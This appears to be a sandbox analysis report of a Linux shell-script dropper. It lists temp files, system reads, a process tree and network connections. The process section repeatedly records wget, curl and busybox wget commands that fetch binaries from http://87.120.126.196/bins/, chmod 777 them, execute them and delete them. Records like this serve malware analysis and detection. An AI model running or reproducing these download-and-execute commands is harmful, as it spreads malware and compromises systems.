N/A /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 N/A
N/A /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq N/A
N/A /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 N/A
N/A /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu N/A
N/A /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g N/A
N/A /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 N/A
N/A /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ N/A
N/A /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 N/A
N/A /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 N/A
N/A /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 N/A
N/A /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe N/A
N/A /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E N/A
N/A /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT N/A
N/A /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz N/A
N/A /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /usr/bin/curl N/A
File opened for modification /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 /usr/bin/curl N/A
File opened for modification /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /usr/bin/curl N/A
File opened for modification /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 /usr/bin/curl N/A
File opened for modification /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /usr/bin/curl N/A
File opened for modification /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 /usr/bin/curl N/A
File opened for modification /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 /usr/bin/curl N/A
File opened for modification /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /usr/bin/curl N/A
File opened for modification /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 /usr/bin/curl N/A
File opened for modification /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 /usr/bin/curl N/A
File opened for modification /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ /usr/bin/curl N/A
File opened for modification /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ /usr/bin/curl N/A
File opened for modification /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /usr/bin/curl N/A
File opened for modification /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 /usr/bin/curl N/A
File opened for modification /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /usr/bin/curl N/A
File opened for modification /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /usr/bin/curl N/A
File opened for modification /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /usr/bin/curl N/A
File opened for modification /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 /usr/bin/curl N/A
File opened for modification /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 /usr/bin/curl N/A
File opened for modification /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /usr/bin/curl N/A
File opened for modification /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /usr/bin/curl N/A
File opened for modification /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /usr/bin/curl N/A
File opened for modification /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /usr/bin/curl N/A
File opened for modification /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /usr/bin/curl N/A
File opened for modification /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /usr/bin/curl N/A
File opened for modification /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 /usr/bin/curl N/A
File opened for modification /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /usr/bin/curl N/A
File opened for modification /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /usr/bin/curl N/A

Processes

/tmp/edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh

[/tmp/edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/chmod

[chmod 777 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E

[./s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/rm

[rm s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/usr/bin/wget

[wget http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/chmod

[chmod 777 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT

[./1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/rm

[rm 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/usr/bin/wget

[wget http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/chmod

[chmod 777 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz

[./MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/rm

[rm MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/chmod

[chmod 777 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319

[./ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/rm

[rm ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/usr/bin/wget

[wget http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/chmod

[chmod 777 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe

[./Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/rm

[rm Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/usr/bin/wget

[wget http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/chmod

[chmod 777 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94

[./rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/rm

[rm rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/usr/bin/wget

[wget http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/chmod

[chmod 777 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu

[./vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/rm

[rm vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/usr/bin/wget

[wget http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/chmod

[chmod 777 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g

[./t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/rm

[rm t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/usr/bin/wget

[wget http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/chmod

[chmod 777 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq

[./X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/rm

[rm X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/usr/bin/wget

[wget http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/chmod

[chmod 777 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12

[./sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/rm

[rm sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/usr/bin/wget

[wget http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/chmod

[chmod 777 hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ

[./hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/rm

[rm hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/usr/bin/wget

[wget http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/chmod

[chmod 777 3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3

[./3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/rm

[rm 3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/usr/bin/wget

[wget http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/chmod

[chmod 777 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0

[./OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/rm

[rm OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/usr/bin/wget

[wget http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/chmod

[chmod 777 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6

[./tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/rm

[rm tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/usr/bin/wget

[wget http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/chmod

[chmod 777 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq

[./X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/rm

[rm X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/usr/bin/wget

[wget http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/chmod

[chmod 777 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94

[./rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/rm

[rm rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/usr/bin/wget

[wget http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/chmod

[chmod 777 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu

[./vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/rm

[rm vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/usr/bin/wget

[wget http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/chmod

[chmod 777 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g

[./t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/rm

[rm t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/usr/bin/wget

[wget http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/chmod

[chmod 777 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12

[./sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/rm

[rm sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/usr/bin/wget

[wget http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/chmod

[chmod 777 hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ

[./hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/rm

[rm hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/usr/bin/wget

[wget http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/chmod

[chmod 777 3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3

[./3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/rm

[rm 3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/usr/bin/wget

[wget http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/chmod

[chmod 777 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0

[./OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/rm

[rm OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/usr/bin/wget

[wget http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/chmod

[chmod 777 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6

[./tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/rm

[rm tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/usr/bin/wget

[wget http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/chmod

[chmod 777 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe

[./Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/rm

[rm Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/usr/bin/wget

[wget http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/chmod

[chmod 777 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E

[./s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/rm

[rm s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/usr/bin/wget

[wget http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/chmod

[chmod 777 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT

[./1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/rm

[rm 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/usr/bin/wget

[wget http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/chmod

[chmod 777 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz

[./MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/rm

[rm MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/chmod

[chmod 777 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319

[./ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/rm

[rm ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
